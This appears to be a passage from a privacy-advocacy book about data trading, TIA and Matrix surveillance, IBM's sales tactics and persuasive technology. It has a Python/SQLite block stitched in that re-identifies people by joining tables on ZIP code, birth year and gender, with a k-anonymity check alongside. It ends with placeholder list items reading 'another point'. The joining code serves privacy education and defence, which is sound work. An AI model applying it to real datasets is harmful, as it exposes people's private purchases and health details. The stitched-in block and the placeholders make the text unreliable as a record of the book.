Extract, Transform, Load is a tremendously useful genre of software that has made great strides in the era of Service Oriented Architecture. The goal of ETL is to allow its user to quickly and easily grab data from anywhere in any format and put it into its proper place in a file, typically a very ambitious type of database called a data warehouse. Big companies show how much they value the idea of being able to offer ETL capabilities when for example IBM purchased ETL software maker Ascential in 2005 for $1.1 billion, more than four times Ascential’s revenue, which was growing at a clip of 50% a year. While ETL software is designed to serve entirely legitimate needs of legitimate enterprises, imagine how useful ETL software can be for a member of a cookie club. Cruise around the world of Web Services looking for tables of personal information, make a backroom deal for sharing the data. Remember, these are easy deals to make because unlike most exchanges where both parties actually give up something, table sharing is like any other kind of prostitution: you still have the asset after you sell it.
Vendors of ETL software include IBM/Ascential, Informatica, Microsoft, Pervasive Software, and Ab Initio. Of Ab Initio, Wikipedia says:
Ab Initio is known for being very secretive in the way that they run their business… Forcing prospective customers to jump through non-standard security hoops …As a privately held company it is not disclosing any revenue or employment numbers.
Pervasive Software pitches its Data Integrator aggressively:
Staying Ahead of the Competition
In today’s information-driven markets, businesses face the competitive challenge of finding new and better ways to aggregate, replicate, convert, and load data from across the enterprise into centralized stores for informed decision making.
Compounding this challenge, data must often be gathered from widely disparate sources, across multiple platforms and environments, and between both new and legacy systems—all on a real-time, event driven, or scheduled occurrence.
Without quality data gathered and processed on a regular basis, businesses lack the vital information they need to make the right decisions at the right time—and stay ahead of the competition.
What if “the competition” is a marketing manager’s rival for the next job up the ladder? ETL software can run on personal computers in the home or, to cover one’s tracks even better, in a PC in a neighboring town’s public library.
TIA-ing into the Stream of Fear Data
Back before tables from different organizational sources learned to mate, data mining was something that ostensibly took place among the tables of a single organization, a process to ferret out relationships and patterns that “help us to better serve our customers.” The mining of data using Orwellian joins, on tables of uncertain ownership or pedigree, tables floating around among cookie clubs, is not a public activity. It has not been acknowledged in any visible way by any recognizable companies or governments. September 11 has brought the tabular sex version of data mining out of the closet, using a vehicle called Terrorism Information Awareness. TIA (name changed in mid-2003 from Total Information Awareness in order to frighten the masses into accepting it) is a government project, sponsored by the same Defense Advanced Research Projects Agency that brought us the original Internet. Its goal is to provide to law enforcement agencies the ability to link all information about a suspected terrorist or anything or anyone related to the suspect. TIA brings together both reference-type information but also telephone records, travel itineraries (completed and not completed), information from bank statements, securities, transactions, credit and debit card transactions, trips through toll booths, and of course email gleaned from either Echelon or other sources.
The Electronic Frontier Foundation officially considers the plan for TIA to be worthy of the title How to Build a Police State. Mitchell Kapor, its founder, resigned from the board of Groove Networks over Groove’s willingness to support TIA in its software specifications. The EFF and other privacy and civil liberties organizations have made some impact, resulting in Congress modifying TIA’s charter on September 24, 2003, limiting it to foreign surveillance. However, it appears that the domestic portion of TIA has been moved to a service named Matrix, which stands for Multistate Anti-Terrorism Information Exchange. According to Boston.com,
Matrix houses restricted police and government files on colossal databases that sit in the offices of Seisint Inc., a Boca Raton, Fla., company founded by a millionaire who police say flew planeloads of drugs into the country in the early 1980s.
“It’s federally funded, it’s guarded by state police but it’s on private property? That’s very interesting,” said Christopher Slobogin, a University of Florida law professor and expert in privacy issues.
As a dozen more states pool their criminal and government files with Florida’s, Matrix databases are expanding in size and power. Organizers hope to coax more states to join, touting its usefulness in everyday policing.
Putting Matrix inside a private enterprise apparently allows the system to keep personal information that would violate the Privacy Act of 1974 if it were kept on government facilities.
At the other end of the spectrum, author Howard Bloom views TIA as a development that, like the original Arpanet, will be used by all of us. Calling it an “IQ expansion pack capable of plowing through the built-in barriers of central nervous system–based software,” Bloom says “It will show us whole new ways to look at what we’re up against—whether it’s bin Laden, a demanding boss, or that damn lost phone number.” He dismisses the privacy and perception-control threat with “Public scrutiny of ominous-sounding government plans is a good thing. If people are being abused by Big Brother, it’s vital to drag the atrocities out of hiding and stop them. The misuse of technology is a social evil, and it’s essential to fight against this sort of crime. But let’s remember that the evil resides in the crime, not the technology.”
Both Kapor and Bloom make valid points, but both are naïve. Bloom is naïve about the possibility of misuse of TIA and other sources of tables, naïve about whether a group in control of the resulting information and communication resources could be stopped after the fact. If TIA indeed became the central nervous system of an Orwellian police state, would Bloom then circulate a petition or initiate legislation to curtail its powers? The person or “assembler” (described later) in charge of TIA would easily thwart any such democratic subversion. Locking him out of society would take just a few keystrokes.
Kapor is naïve in thinking that civil liberties must always trump security, even in a world where terrorists are real and they know how to use our Constitution against us as a defensive weapon.
We can have both. We can have a viable public data mining facility that will provide immense benefit to every information-using person on Earth, including law enforcement people, and we can have privacy—far better privacy than we have today. The key is a new kind of control on the use of information. Later we will describe in more detail the means to that control, the Personal Intellectual Property Infrastructure.
Until we have MOI (the Personal Intellectual Property Infrastructure) however, TIA-ing into the stream of data that is propelled by fear of terrorists will be a regular means of filling up those tables and getting them ready for their visit to the stud farm.
Footprints in the Snow
Later we’ll be taking a look at some new technology that is designed to enable you to protect—strongly protect—your privacy. Part of that technology could involve a device that reads information on a driver’s license. However, privacy advocates have sponsored legislation to make it illegal in two states. The encroachment on privacy never ends, and so it’s understandable that those who watch out for encroachment would attack such an obvious PII machine. The protection impulse says, “Don’t just stand there, do something.” Prevent the obvious info grabbing, the kind that goes on in broad daylight. The driver’s license has a unique identifier on it, the social security number or other unique identifier. One can build a database with that basic piece of PII. This approach assumes that by preventing access to the unique government-issued identifier called social security number, or its equivalent, information about an individual cannot be collected in one central place. This is not only false, it is dangerous, and it leads to the false sense that protecting a certain kind of information materially thwarts privacy encroachment. It does not. In fact, every time you use your credit card you are registering information that is more meaningful than anything found on your driver’s license. With database technology, a single unique identifier is unnecessary to effectively aggregate information about an individual.
What does it take to figure out where a person is going from these “footprints in the snow”? You needn’t scientifically match every footprint with a piece of information that uniquely identifies that individual among all six billion people on Earth. If you have information of any sort about the identity of the person who made one of the footprints, and it is evident that the same person made all of the prints, then you can start drawing conclusions. If you have thousands of footprints that you can reasonably assume were made by the same individual, there is absolutely no need to link them using a number that some government has assigned to that person.
For example, suppose you had a seat high in an office tower with a panoramic view of people and activities below. In your hands is a laser tag gun with a very special property: it can “brand” the people below without their knowledge, leaving a mark which can later be read by a corresponding piece of special equipment, a receiver, from any distance, even if the subject is not in view.
The user of such equipment could automatically collect information on the location of any person tagged at any time, and compile a record of that person’s detailed activity over a lifetime. But he could never learn any identifying information ever assigned to any of his targets—in other words, he could never learn their names, their social security numbers, credit card numbers, bank account numbers, badge numbers, etc. But the lack of assigned identifying information would not inhibit the tracking activity in any way. Knowledge of social security number might not be worth the cost of the disk space to store those nine digits.
Physical tracking devices are becoming less rare, but they’re not needed anyway. In the world of information we leave our personal trails in a multitude of ways. Cookies are only one of the many sources of crumbs and tags with which we leave our trail. The social security number’s chief value to the cookie clubs is that it misdirects the privacy advocate’s attention to the visible and obvious, allowing the pickpocket to deftly, imperceptibly and continually grab the unobvious small information assets from the victim.
Magicians and performing pickpockets are fascinating to watch. Have you ever been part of the audience that watches a performing pickpocket remove a victim’s wallet, watch, belt, and jewelry—without the victim having a clue?
Guess what—it’s happening to you right now. With your present attire, you’re no match for a good pickpocket. You need to wear “clothing” that thwarts the pickpocket. Forget your social security number. It’s a distraction.
Now what if you were to grab that driver’s license from the encroacher and put it to use for yourself, in the same way a general seizes an enemy’s artillery and uses it against them? What if you were to assume control of the pieces of information about yourself? This is precisely what the Personal Intellectual Property Infrastructure delivers to you.
Mind Control
There is an interesting aspect to the privacy issue that never seems to get covered: What happens when the encroachers are successful? The result is more than a loss of privacy. It is a loss of control, the significance of which is difficult to overestimate. The loss of control takes place through the operation of a principle that you’ve seen illustrated in spy movies and police detective dramas. At some point in the plot the good guy uses the line, “to catch the [bad guys] we have to think like them. First, we have to know everything there is to know about them,” at which point the ace detective or master counterintelligence agent assigns information-gathering tasks to all present.
“Account Control” and the “FUD” Factor
The business corollary to the think-like-your-enemy principle is “To totally control this client you have to think like this client.” Hence the sales manager’s rallying cry to his or her troops working at the client site: gather detailed information about everybody who makes or influences decisions.
I observed firsthand how this happens when I worked at a fairly large insurance company in the 1970s. I helped design software systems and wrote programs that ran on the company’s (physically) big IBM computer. I got to see up close how IBM exercised what they benignly call “account control.”
Account control means identifying every human being in the organization who makes or influences any decisions about the use of technology and learning everything there is to know about that person. IBM made it their business to know not just the usual who-reports-to-whom-and-what-are-his-kids’-names type of information. Any good sales rep does that.
IBM, by contrast, would follow every footstep of the selected individuals. They would watch and know—how they felt about computers, how they dealt with people, what they were up to—that is, where did they want to go in the organization—whom they had lunch with, whom they hung out with, and on and on.
After IBM studied their targeted individuals as a biologist studies a specimen, they would sort them into two overall groups: (1) those who were most likely to do as told and (2) those who were more likely to question things, mention competitors’ products and bring significant information to meetings other than what they got from IBM. Then they would introduce the FUD factor. Anyone who has ever dealt with IBM has heard that term. FUD stands for Fear, Uncertainty, Doubt.
IBM would keep the first group informed about new products, case studies, techniques, and so forth. The second group would be treated courteously but fed old or irrelevant information. When it came time to make big, costly decisions about computer upgrades, the boss would hear from this contingent of radicals talking about alternatives that were much better for a fraction of the cost. But they seemed to be so, well, uninformed.
How confusing. Fraught with fear, uncertainty, and doubt, the boss became the victim of view control and would invariably stick with the known entity, IBM. The result of IBM’s special brand of surveillance and perception control was that IBM practically ran the company. I saw the same phenomenon repeated many times a couple of years later when my new job had me working with people at other IBM customer companies.
Before the insurance company experience, I saw the FUD approach manifested in a clever and amusing way in the Air Force. IBM’s big line printers used a punched paper tape to control page skips. A very simple-looking manual paper punch was used to punch precise rectangular holes in the loop of paper tape. If you had been selected by IBM and your superiors to be in on the IBM meetings, you learned that the operation of the paper punch was totally counterintuitive. The natural thing to do was to push the front of the punch, which wouldn’t have worked. The IBM-trained cognoscenti knew that, contrary to common sense, you had to push down on the back of the punch to make the front of the punch put a hole in the paper. One group of easily influenced individuals would be let in on the secret of the punch, while another, less pliable group was not.
During onsite training on a programming topic, the IBM representative would offhandedly ask one of those who “happened” to be uninformed to punch a hole in a particular spot on the tape while he continued with his talk. As he struggled in the background to perform the seemingly simple act of punching a hole in a piece of paper, the whole group inevitably started chuckling at the ineptitude of the victim. This would cause the IBM rep to turn around, “notice” the problem, and ask one of those who had been informed about the punch to help the victim. The message was simultaneously obvious and subtle: if you play ball with IBM you will know what’s going on around here. If you don’t, we will make a buffoon out of you.
Another FUD campaign was much more public. Some may recall that the familiar twenty-five-pin connector was synonymous with “serial”—the standard RS232 serial communications protocol for modems and other peripherals. Printing devices typically used a very different-looking (“Centronics”) parallel connector at both ends of a cable like the one still used at the printer end today.
All of a sudden the IBM Personal Computer arrived on the scene, with a very confusing printer connection. What was apparently a serial connector was really a parallel connector. Engineers recognize this sort of thing as a classic example of a choice that is certain to cause confusion, i.e., a very bad design choice. But it all depends on what you are trying to accomplish. If your goal is to discredit all the old geeks, what better way than to leave them fumbling around in front of the client, unable to connect a simple printer? The client politely turns to someone who has been properly “trained” by IBM in the way these new personal computers really work.
What has all this got to do with privacy? Very simply, if I know enough about you and I have access to your perceptions, I can control you. Few people want to believe that. And in the past, “knowing enough about you” meant knowing about you as a demographic statistic. “Having access to your perceptions” meant being able to buy commercials on TV shows that your demographic group likes to watch. “Controlling you” meant influencing the brand of peanut butter you bought or the candidate you voted for.
That is all changing. If you are not now targeted as an individual, you soon will be.
If you believe you are too smart, too wary, too in control to be manipulated by a robot, then you are the most vulnerable of all. I, the author, instinctively want to reject this notion. I want to believe that I can filter my own perceptions, that I can remain in control of my opinions and choices—certainly in the face of some mindless robot. But as I look analytically at the way some of these things work, I realize that I cannot rationally make that claim.
Captology
Captology. If that is a real word, surely it was coined by some conspiracy theorist.
How about the Persuasive Technology Lab? Surely that cannot be what it sounds like, and surely it does not exist in any really credible environment. It must be another artifact of some overly imaginative paranoid with too much time on his hands, this year’s version of the Trilateral Commission or the Club of Rome, no?
No.
Allow me to introduce that most highly respected and admired pillar of academe, Stanford University, and its Persuasive Technology Laboratory. As the name implies, the Persuasive Technology Lab develops machines and programs that get you to do things you otherwise wouldn’t do. And the term they have coined for their field of study is… you guessed it, Captology. Check it out. From their website:
Welcome to the Stanford Persuasive Technology Lab. In our lab we research and design interactive technologies that motivate and influence users.
Like human persuaders, persuasive computing technologies can bring about positive changes in many domains, including health, safety, and education. With such ends in mind, we are creating a body of expertise in the design, theory, and analysis of persuasive technologies. We call this area “captology.”
Because captology expertise can enhance interactive technologies outside the world of academia, our research often involves collaborations with industrial partners, clients, and affiliates. We also focus on developing the best methods for designing and prototyping new persuasive technologies.
So there it is: a laboratory at Stanford University dedicated to the study of getting people to do what you want them to do through the use of computers. (It’s noteworthy that the Stanford.edu website, which is quite informative about the immense variety of work that goes on at the university, somehow neglects to list the Stanford Persuasive Technology Lab.)
One of the lab’s projects is called Optilex. The following is taken from the Captology newsletter:
The [controversial] idea behind Optilex is that language guides how we think and act. By knowing more words that are positively valenced, a person is more likely to perceive and act in positive ways. This raises a big question: Could Optilex really change how people think and behave? We don’t know; we haven’t yet measured the effects.
The following are also taken from the Captology newsletter:
SURVEILLANCE TECHNOLOGIES—PERSUASIVE OR COERCIVE?
Surveillance technologies are commonplace—everything from spying on nannies to monitoring Web use at work. While a few surveillance products can be considered persuasive technologies, we find the majority to be coercive, not persuasive.
Coercion in any form raises ethical questions, and this is especially true when technology is designed for this end. At times, however, a coercive technology may be for the public good, such as a system that monitors employee hand-washing behavior at restaurants.
Ethical or not, one thing seems clear: The use of surveillance tech—and the controversy about such use—will grow as technology advances . . . .
ENTERTAINMENT + PERSUASION = “INFLUTAINMENT”
in*flu*tain*ment, n. Entertainment that motivates or persuades
Although the concept is not new, “influtainment” is a new word to describe experiences that combine persuasion and entertainment. Technology examples include the CD-ROMs “Alcohol 101” and “5-A-Day Adventures.” We find that these and other products keep their audiences tuned in long enough to deliver persuasive messages or to motivate new behaviors. In the future, we expect to see more examples of influtainment on the web and in specialized high-tech devices.
The Dark Side of Captology
Throughout the discussions about Captology there are exercises labeled, “The Dark Side.” By studying the Dark Side exercises, the Captology student is supposed to learn about the ethics of Captology by becoming familiar with the ways in which it should not be used, lest it give the student inordinate power and wealth. [Wink, wink. Nudge, nudge.]
In the MTV show Jackass, predominantly male twenty-somethings attempt everything short of killing themselves (rolling down a hill in a shopping cart, dropping heavy weights on themselves, etc.) in the name of “compelling television.” Of course the demographic is prepubescent teenage boys. And there are warnings: “Don’t try this at home. These people are trained idiots, not teenage boys with no sense of fatality.” Of course the warnings are ignored. Of course there have been lawsuits.
Or: “These instructions on how to make a bomb out of fertilizer and diesel oil are only for the purpose of alerting the reader so that he or she can recognize the pattern and discern when someone is doing something unsafe…”
Or: “This paper describes how to acquire a handgun without any paperwork in the hope that readers will recognize such illegal methods when they see them being followed… [Wink, wink.]”
There are plenty of precedents for this way of telling someone how to do something unethical by offering never-do-this instructions followed by details on what is never to be done.
The Dark Side of KITA
In the 1980s, an employee motivation technique called KITA generated a buzz around Harvard Business School. Generally associated with Frederick Herzberg, the technique calls for identifying emotional triggers in employees and “pushing their buttons,” i.e., invoking those emotional triggers at key moments in order to effect certain behaviors. According to Herzberg, KITA stands for “Kick In The Ass.”
Herzberg identified two kinds of KITA: positive and negative. My acquaintances at the school told me that negative KITA was a “dark side” application of the technique and was dealt with in a dismissive manner as a matter for classroom study. After classes, in the local pub, however, the emphasis was quite different. Not only did negative KITA get the attention, but the focus was on how to use it to get one’s boss to discredit himself, resulting in his removal from the organization and opening up a rung on the ladder to the top.
Negative KITA is quite similar to a game that is familiar to anyone who grew up with siblings. The object of the game is to get the adversary to discredit himself or herself among parents, peers, and everyone else. For example, with parents nearby, the perpetrator “accidentally” bumps the adversary’s most precious model car, knocking it off its shelf right in front of him, in such a manner that the sibling can see it was quite intentional. Rival sibling screams, shoves, hits. Parents rush to check out the latest transgression and learn that an innocent accident has led to unwarranted retaliation. Parents discipline the apparent offender, who is of course more the victim than the perpetrator.
The goal of the technique is to get your rival to portray himself as a seething, sociopathic malcontent. In the home, the process goes through shouting and strife and perhaps visits to a counselor. In the workplace, it ends with a termination.
In the early ’90s, Harvard Business School announced a major effort to raise the importance of ethics among the subjects in their MBA curriculum. The reason for this initiative was the strong informal negative KITA culture that had developed outside the classroom. Or more accurately, Harvard MBAs were getting a reputation: if you hire one of them you’d better start looking for a new job. Producing products—Harvard MBAs—that have a reliability problem when deployed is detrimental to the brand, so Harvard was simply fixing a problem with its brand.
KITA illustrates a couple of things. First, the smartest, most wary people can be manipulated if you know something about their psychological hot buttons. Second, the study of powerful weaponry—including powerful psychological weaponry—always leads to using that weaponry to gain power. Perhaps most students are balanced and responsible and view “dark side” examples as illustrations of what not to do. The others, perhaps the minority, take their lessons directly from the “dark side” examples. Guess who ends up with more power. The lesson is at least as old as Machiavelli.
Examples of the misuse of the ability to manipulate perceptions and behavior are all around us. Tobacco companies keep their markets alive by getting children addicted. When the heat is on in the United States they work their evil schemes in other countries. Can we prove that with internal memos and other authoritative documentation? Of course not—only idiots put such schemes on paper, and cigarette-marketing executives are not idiots. Nor are KITA-displacers. Nor captologists.
People think of oppressive regimes as exclusively the domain of governments and employers, because they are visible. But the cabal that consists of the network of cookie clubs, the skilled proliferators of parasites, and the captologists has the potential to exceed dictators and company-town tyrants by any measure of oppressiveness. Traditional tyrants control public discourse, leaving any critical thoughts locked inside people’s heads. This new axis of evil has the ability to oppress people from within their heads.
Privacy Statements and Private Information Swap Meets
Privacy statements abound. It seems that every website operated by a major organization has one. So what are privacy statements all about? To be sure, privacy statements are probably adhered to by many of the officers of organizations that offer them. But how many privacy statements have you taken the time to read? And what is the probability that some organizations simply do not adhere to them? Perhaps management upholds the policy, but what about contract programmers and part-time or freelance database administrators and “data cleaners,” who really don’t have much loyalty to the organization offering the privacy policy? How difficult is it for someone who touches the information to write a CD or two, or simply email a few files to an acquaintance as a favor? Remember, there is the temptation not only of money but of real power in joining a cookie club.
Consider the case of the failed Internet retailer toysmart.com, a licensee of the TRUSTe Privacy Program. The company’s stated privacy policy was:
Personal information, voluntarily submitted by visitors to our site, such as name, address, billing information and shopping preferences, is never shared with a third party. All information obtained by toysmart.com is used only to personalize your experience online. . . . When you register with toysmart.com, you can rest assured that your information will never be shared with a third party.
Despite assurances to the contrary and the weight of a privacy policy authority, the company did indeed sell personal information, including names and birthdates of consumers’ children. If the first casualty of war is the truth, then the first casualty of financial pressure is integrity. In this case, the sale of information in violation of privacy policy became a public issue that lingered until the good name of Toysmart investor Walt Disney Company started getting dragged around with the story. Disney then put up the money to buy the customer information asset back from the high bidder. The first visible casualty of the uncertain business model underlying the e-tailing “industry” was bound to get the scrutiny of journalists, the SEC, the FTC, and on and on.
Keep in mind that for every Toysmart that goes belly up in a very public fashion, there are hundreds of companies, product lines, business units, and, mostly, middle managers, who are under pressure from upper management and Wall Street to produce results right away.
Do most compromises of personal information take place in such a fishbowl? Surely not. They happen in bland cubicles and over lunch tables. After all, the transfer of eighty gigabytes of information encompassing sensitive information about millions of individuals is as simple as the handing over of an envelope, a tape cartridge, a Blu-ray disc, or one of the really small portable USB hard drives—no management people, no chief privacy officers, no privacy policy involved.
We’ve all heard that in the information age, information is money. It’s true. If information didn’t have high value, there would be no incentive for people to do what we are discussing here.
In assessing the danger to your own privacy, ask the following questions:
1. Are you going to keep track of all the privacy statements affecting all your sources of information and all your venues of communication?
2. Which organizations take them seriously, enforce them internally, and which do not? How will you know? And how will you keep track?
3. What are the mechanisms for connecting the privacy protocol of one organization with that of another organization with which it shares information?
4. Of most concern: people and companies change behavior when the pressure is on. Who ensures that when the company’s stock price starts to tank they don’t seize a quick revenue advantage by taking liberties with PII? All it takes is a “lost” or “stolen” notebook.
There is one big difference between valuable information and valuable money—a difference that often gets overlooked. If I take money out of the company, it is gone. The larger the amount of money, the more likely its absence will be noticed. You can’t click on money and double it by pasting it into a new folder.
Information is different. You steal it, and it’s still there. The company that owns the PII on you is not all that concerned, as long as two conditions are met: first, the disclosure of the information will not cause real financial loss to the company or its management; and no one can later demonstrate that the company or its management was actually involved in the shady transaction.
A manager has a number to meet. There is a sales goal, a service goal—something by which his or her performance will be judged. “If only I had such-and-such a file from the consumer division of our channel partner Acme Industries . . .” End of quarter looms, the performance numbers are not looking so hot. . . . Then a discreet phone call is made. “Hello, Joe? Listen, I want to talk to you about some information you have over there at Acme. Let me buy you lunch tomorrow. . . .”
Now, Acme the corporation would never violate the privacy policy that it publishes so conspicuously on its website. Acme would never tolerate an employee violating the policy on his or her own. That is, Acme would never tolerate it if it were done sloppily and openly.
However, an individual, “unauthorized” action performed deftly and without a trace is another story.
Part of being deft is honoring management’s orders: “Don’t let me hear about any violations of this policy by our people.” In other words, do it quietly. Use your own USB drive from home. And make sure you get some information of roughly equal value in exchange for it. And if I catch you, you’re fired. So don’t let me catch you. But do make your numbers.
We can just hear the chief privacy officers reacting to this assertion. “Prove it!” they shout.
Prove it with what—a survey of suspects? Okay, here’s our sample survey:
A statistic about unauthorized data sharing is as unverifiable as a statistic about infidelity. The only sources of information are perpetrators. (Consider surveying prison inmates with one question: “Did you do it?” Would you trust the results?)
But there are clues. The information storage business continues to grow at a fantastic rate, as does the perceived need for storage. Capacities of individual disk drives grow fast, prices of both disk drives and storage management systems decline precipitously, yet revenues of storage vendors are going through the roof. Do the math—revenue divided by price-per-gigabyte for the last five years. Where are all these terabytes being used? How is it that companies are generating information so rapidly? Or are they all swapping information at a furious pace, each making its own copy of everything that comes in over the transom, in a kind of newsgroup-for-snoopers fashion?
Some would say the proliferation of multimedia files accounts for the rapid growth of storage consumption. But we are talking about corporate storage systems, not home computers. A big graphics-intensive website for a big company might take up a gigabyte. That’s one-thousandth of a terabyte. Big companies gobble up many terabytes of storage each year in order to store names and numbers, not MP3 files and videos.
Here’s another clue. I received the following unsolicited message because somehow someone thought I belonged on a headhunter mail list:
Receive FREE Corporate Directories! Good From November 26th to November 30th, 2001
Dear Executive Recruiter,
DO YOU HAVE ANY CORPORATE DIRECTORIES and/or ASSOCATION DIRECTORIES? WHAT ABOUT EMPLOYEE DATABASES? If so . . .
Welcome to Corporate Directory Trade Week. Take your Corporate Directories and/or Association Directories and TRADE THEM FOR MORE INFORMATION. That’s Right, you can SAVE SERIOUS CASH. This Special Offer is the very first time available. We understand that times are hard due to Sept. 11th, so that is why NOT spending any money on this IMPORTANT RESEARCHING TOOL, is a wonderful opportunity for you to kick start your business. Here is our COMPLETE DIRECTORY LIST for you to choose from . . .
DIRECTORY LIST
AAPP-American Academy of Pharmaceutical Physicians 2001
ASCO-American Society for Clinical Oncology
Quintiles Corporate Directory 2000 CD
SmithKline Beechem 2000
Bayer 2000
Amgen 2001
Shering Plough 2000
Indiana University 2000 ($599.00)
Aventis 2001
PriceWaterhouseCoopers 2001 CD
KPMG 2001 CD
3Com 2000 CD
Accenture 2000
AON Consulting 2001 CD
Above.net 2000 CD
Airtouch 2000 CD
Amazon.com 1999
AnswerThink Consulting 2000 CD
Arthur Andersen 2000
Aspect/i2 Tech 1999/2000 CD
Attendee Telecom Expo 2000 CD
Aurum/Invenys Software 2000 CD
Avery Dennison 2000 CD
Bain & Co. Alumni 2000 CD
Bayer 2000
Booz Allen 2000
Brooktrout Tech. 2000 CD
Cambridge Tech. Partners 2000 CD [54 lines clipped, C to S]
Sun Micro Systems 2000
Texas Instruments 2000
United Tech 2000
US Healthcare 2000 CD
Viacom 2000
Xylan 2000 CD
Yahoo 2000 CD
We look forward on helping your business grow. YOU WILL ALWAYS NEED NEW EMPLOYEE CONTACT INFORMATION!!! We also send samples upon request. We also need samples as well. Honesty is the best policy. [Sender’s name deleted] RESEARCH CONSULTANT 773-377-5002 x6704
That is only a solicitation of employee directory information, which is certainly not the most invasive and sensitive information that might be shared. But look at the process. A middleperson has made a business out of list sharing. Not only that, it’s such an accepted practice that a message like that goes out in broadcast fashion to people who might or might not be headhunters.
Consider what kind of list sharing takes place behind closed doors between parties who are familiar to information brokers. And consider how middlepersons can keep the real sharers of information at arm’s length from the actual transaction, insulating everybody involved from difficulties should news of the event reach the wrong ears.
People are rightfully concerned about companies misusing information about them, which is how privacy statements developed and why we sign them. We also worry about the mere accumulation of information about us, but that concern is a little more diffused and vague. In reality, however, we are not looking at isolated islands of information about ourselves—our personal information has means of traveling off the island of privacy statements.
The following is a personal hunch, far from a provable theory: In the hands of a skillful user of the retrieval language called SQL, the power of a collection of information of certain types to be used as a tool for manipulating perceptions and actions is proportional to the square of its quantity. In other words, doubling the amount of PII in one place or a closely linked set of places quadruples the power of the collection. That is why PII databases grow.
They grow because they want to grow. They want to be big, and therefore they want to merge. Barriers to joining tables in disparate relational databases are withering rapidly. Your tables on a server in Singapore can easily mate with mine in Toronto, the offspring being something that inevitably makes us both more powerful.
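The footprints-in-the-snow argument and the point just made about joining tables in disparate databases, as an added example that is not the book’s own code: two constructed tables that share no social security number, name or account number are joined in SQLite on three ordinary attributes (ZIP code, birth year, gender), and a purchase history is attributed to a named person wherever those attributes pin the person down. The ZIP codes, years, names and e-mail addresses are invented. The second function is the check a data steward would run before releasing or sharing a table: the k-anonymity of its quasi-identifiers, that is, the smallest number of rows that share one attribute combination, and how many rows stand alone.

```python
"""Linking records without a government-issued identifier.

Added example (not from the book). Neither table below carries an SSN;
only the roster carries a name. The join uses nothing but attributes
that any card purchase or membership form records anyway.
"""
import sqlite3

QUASI_IDS = ("zip", "birth_year", "gender")
TABLES = ("purchases", "roster")  # allow-list for the report query

# Constructed sample data. `PURCHASES` is what a retailer keeps from card
# transactions; `ROSTER` is a partner's loyalty-programme membership list.
PURCHASES = [
    ("02139", 1971, "F", "prenatal vitamins"),
    ("02139", 1971, "F", "crib"),
    ("02139", 1971, "M", "golf balls"),
    ("60614", 1985, "M", "diabetes test strips"),
    ("60614", 1985, "M", "insulin pen needles"),
    ("94110", 1990, "F", "running shoes"),
    ("94110", 1990, "F", "energy gel"),
    ("94110", 1990, "F", "marathon registration"),
    ("94110", 1990, "M", "coffee beans"),   # nobody on the roster matches
]
ROSTER = [
    ("A. Example", "02139", 1971, "F", "a.example@invalid.test"),
    ("B. Example", "02139", 1971, "M", "b.example@invalid.test"),
    ("C. Example", "60614", 1985, "M", "c.example@invalid.test"),
    ("D. Example", "94110", 1990, "F", "d.example@invalid.test"),
    ("E. Example", "94110", 1990, "F", "e.example@invalid.test"),  # same attributes as D
]


def build_db():
    """Load both constructed tables into an in-memory SQLite database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE purchases(zip TEXT, birth_year INT, gender TEXT, item TEXT)")
    con.execute("CREATE TABLE roster(name TEXT, zip TEXT, birth_year INT, gender TEXT, email TEXT)")
    con.executemany("INSERT INTO purchases VALUES (?,?,?,?)", PURCHASES)
    con.executemany("INSERT INTO roster VALUES (?,?,?,?,?)", ROSTER)
    return con


def link_purchases_to_people(con):
    """Join the tables on the quasi-identifiers alone.

    Returns {name: sorted items} for every roster member whose attribute
    combination belongs to exactly one roster row; where two members share
    the combination (D and E) the footprints stay ambiguous and are skipped.
    """
    rows = con.execute("""
        SELECT r.name, p.item
        FROM roster r
        JOIN purchases p
          ON p.zip = r.zip AND p.birth_year = r.birth_year AND p.gender = r.gender
        WHERE (SELECT COUNT(*) FROM roster r2
               WHERE r2.zip = r.zip AND r2.birth_year = r.birth_year
                 AND r2.gender = r.gender) = 1
        ORDER BY r.name, p.item
    """).fetchall()
    linked = {}
    for name, item in rows:
        linked.setdefault(name, []).append(item)
    return linked


def k_anonymity_report(con, table, quasi_ids=QUASI_IDS):
    """Group `table` by its quasi-identifiers and measure the group sizes.

    Returns (min_k, n_singletons): the table's k-anonymity and the number
    of rows that are alone in their group, i.e. identifiable by attributes.
    Identifiers cannot be bound as SQL parameters, so the table name is
    checked against an allow-list rather than interpolated blindly.
    """
    if table not in TABLES:
        raise ValueError(f"unknown table {table!r}")
    cols = ", ".join(quasi_ids)
    counts = [n for (n,) in con.execute(f"SELECT COUNT(*) FROM {table} GROUP BY {cols}")]
    return min(counts), sum(1 for n in counts if n == 1)


if __name__ == "__main__":
    db = build_db()
    for person, items in link_purchases_to_people(db).items():
        print(person, "->", items)
    for t in TABLES:
        print(t, "k-anonymity / singletons:", k_anonymity_report(db, t))
```

Three of the five roster members are pinned down by ZIP code, birth year and gender alone, and the purchase lines attached to them say far more than a license number would. The report is the useful half for a defender: a table whose minimum k is 1 is not anonymised by stripping the SSN column, and the same query applied to the columns a partner will also hold tells you what a join would yield before you hand the data over.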
How Big Is the Tabular Sex Trade?
We will probably never know the real extent of the practice of illegal and unauthorized table joining. It’s more difficult to track than any underworld activity in history for two reasons: (1) unlike traditional crimes where money must be removed from one place in order for it to appear in another, tables are not removed—they are copied; and (2) the perpetrators do not have to physically meet. The tabular sex trade is a prime beneficiary of the virtual enterprise movement, operating as it does in a world where virtual offices need no occupancy permits.
As in other situations where a new weapon technology or criminal opportunity has been invented, the question is not whether but when and to what extent. Illegal tabular sex appears to be pervasive now, but it will only get worse. Unless we take steps to stop it.
The Solution
Fixing the Internet may seem like a darkly daunting task, but there is one celestially bright spot. By replacing the assumptions that underlie the design of our information facilities with another very familiar set of assumptions about facilities, the solution becomes exceedingly clear.
1. Understand that the Internet is, as originally characterized, a highway, that is, an outdoor public transport facility. This applies to all existing “layers” of the Internet Protocol (IP): they are all transport layers. The so-called “application layer” is really the signage and markings layer on the highway.
2. Toss aside the notion that you can’t understand this stuff. If you understand how to use a highway you can understand this. We will show that if you aren’t carrying the baggage of an information security expert, then you will understand the architecture of online facilities better than an information security expert does.
3. Ask yourself: what are highways typically used for? Most vehicles on the roadways are transporting people and things from one building to another building.
4. Ask yourself: what does a building provide that a highway does not?
5. another point
6. another point
7. We have a fine set of construction materials for making buildings as opposed to highways. This set of materials is called PKI.
8. PKI experts understand construction materials very well. They know nothing about architecture, building codes, and occupancy permits.
9. For that reason, they have built the only kind of structure that they, as experts in highways and construction materials, understand. They have built tunnels.
